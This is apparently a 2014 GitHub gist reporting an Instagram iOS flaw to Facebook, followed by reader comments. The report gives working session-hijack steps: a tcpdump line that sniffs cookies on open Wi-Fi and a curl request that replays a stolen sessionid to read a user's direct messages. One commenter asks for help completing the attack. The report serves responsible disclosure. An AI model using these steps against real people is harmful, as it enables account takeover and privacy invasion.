Instantly share code, notes, and snippets.

Embed
What would you like to do?
FB Responsible Disclosure

Instagram iOS session hijack

Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers allowing full session hijack by a malicious actor.

Steps to reproduce (on Mac OS X):

  • Jump on an open or WEP encrypted wifi access point
  • Put your network interface into promiscuous mode filtering on i.instagram.com
     sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com
    
  • Wait for someone to use the Instagram iOS app on the same network
  • Extract cookie request header from the resulting output
  • Use sessionid cookie parameter to make any api call as that user Even https endpoints like direct messages.
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
      -H 'Cookie: sessionid=REDACTED' \ 
      https://i.instagram.com/api/v1/direct_share/inbox/`
    

This returns the user's direct message inbox as JSON

I was able to perform a session hijack on my own account on my laptop while someone else browsed instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to instagram.com as an unlogged in user.
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see I'm logged in as that user

There is some screwy behaviour where 'instagram.com/' gets into redirect loop, I will see if I can fix that. However going to 'instagram.com/someones_profile' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.

Recommendations:

  • Use SSL everywhere
  • Revoke all logged-in sessions?
@wodim

This comment has been minimized.

Show comment
Hide comment
@wodim

wodim Jul 27, 2014

I'm adding another recomendation:

  • Sue me

wodim commented Jul 27, 2014

I'm adding another recomendation:

  • Sue me
@stevegraham

This comment has been minimized.

Show comment
Hide comment
@stevegraham

stevegraham Jul 27, 2014

@wodim I adhered to the FB responsible disclosure procedure. FB replied saying they're already aware of the issue and closed the ticket.

Owner

stevegraham commented Jul 27, 2014

@wodim I adhered to the FB responsible disclosure procedure. FB replied saying they're already aware of the issue and closed the ticket.

@jasiek

This comment has been minimized.

Show comment
Hide comment
@jasiek

jasiek Jul 28, 2014

Can you crawl their contact list, or is that SSL-ed?

jasiek commented Jul 28, 2014

Can you crawl their contact list, or is that SSL-ed?

@jcready

This comment has been minimized.

Show comment
Hide comment
@jcready

jcready Jul 28, 2014

@wodim what would @stevegraham be sued for even if he didn't adhere to FB's responsible disclosure procedure? People might have frowned on releasing this information before disclosing it to Facebook, but AFAIK there is nothing here that Facebook could sue him for (and win the decision).

jcready commented Jul 28, 2014

@wodim what would @stevegraham be sued for even if he didn't adhere to FB's responsible disclosure procedure? People might have frowned on releasing this information before disclosing it to Facebook, but AFAIK there is nothing here that Facebook could sue him for (and win the decision).

@ceejayoz

This comment has been minimized.

Show comment
Hide comment
@ceejayoz

ceejayoz Jul 28, 2014

@jasiek The gist says the session is valid even on HTTPS endpoints.

ceejayoz commented Jul 28, 2014

@jasiek The gist says the session is valid even on HTTPS endpoints.

@rmrhz

This comment has been minimized.

Show comment
Hide comment
@rmrhz

rmrhz Jul 28, 2014

That's a nice catch.

rmrhz commented Jul 28, 2014

That's a nice catch.

@stevegraham

This comment has been minimized.

Show comment
Hide comment
@stevegraham

stevegraham Jul 28, 2014

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

Owner

stevegraham commented Jul 28, 2014

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

@jasonmp85

This comment has been minimized.

Show comment
Hide comment
@jasonmp85

jasonmp85 Jul 28, 2014

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

jasonmp85 commented Jul 28, 2014

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

@donfrancisco

This comment has been minimized.

Show comment
Hide comment
@donfrancisco

donfrancisco Jul 29, 2014

Got the instasheep domain name if you want me to point it at a github repo.

donfrancisco commented Jul 29, 2014

Got the instasheep domain name if you want me to point it at a github repo.

@anands

This comment has been minimized.

Show comment
Hide comment
@anands

anands commented Jul 30, 2014

+1

@vs4vijay

This comment has been minimized.

Show comment
Hide comment
@vs4vijay

vs4vijay commented Jul 31, 2014

Cool

@Mamugian

This comment has been minimized.

Show comment
Hide comment
@Mamugian

Mamugian Jul 31, 2014

As I read it works only on Mac though... right ?

Mamugian commented Jul 31, 2014

As I read it works only on Mac though... right ?

@boserup

This comment has been minimized.

Show comment
Hide comment
@boserup

boserup Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

@jlopez1286

This comment has been minimized.

Show comment
Hide comment
@jlopez1286

jlopez1286 Aug 1, 2014

the tool is for what platform?? pc,mac,android???

jlopez1286 commented Aug 1, 2014

the tool is for what platform?? pc,mac,android???

@TevLar0202

This comment has been minimized.

Show comment
Hide comment
@TevLar0202

TevLar0202 Aug 6, 2014

@Mamugian could work on any unix/linux platform.

TevLar0202 commented Aug 6, 2014

@Mamugian could work on any unix/linux platform.

@josephrexme

This comment has been minimized.

Show comment
Hide comment
@josephrexme

josephrexme Aug 9, 2014

@jlopez1286 seriously? tcpdump. Didn't expect to see such question on this gist

josephrexme commented Aug 9, 2014

@jlopez1286 seriously? tcpdump. Didn't expect to see such question on this gist

@rashidasgari

This comment has been minimized.

Show comment
Hide comment
@rashidasgari

rashidasgari Oct 20, 2014

Im not really experienced with packet sniffing and all this advanced networking stuff. But i was able to do the packet sniffing on an unsecured network using WireShark and get the session ID of the cookie headers. What do i have to do from here? I would be grateful if anyone could help.

rashidasgari commented Oct 20, 2014

Im not really experienced with packet sniffing and all this advanced networking stuff. But i was able to do the packet sniffing on an unsecured network using WireShark and get the session ID of the cookie headers. What do i have to do from here? I would be grateful if anyone could help.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment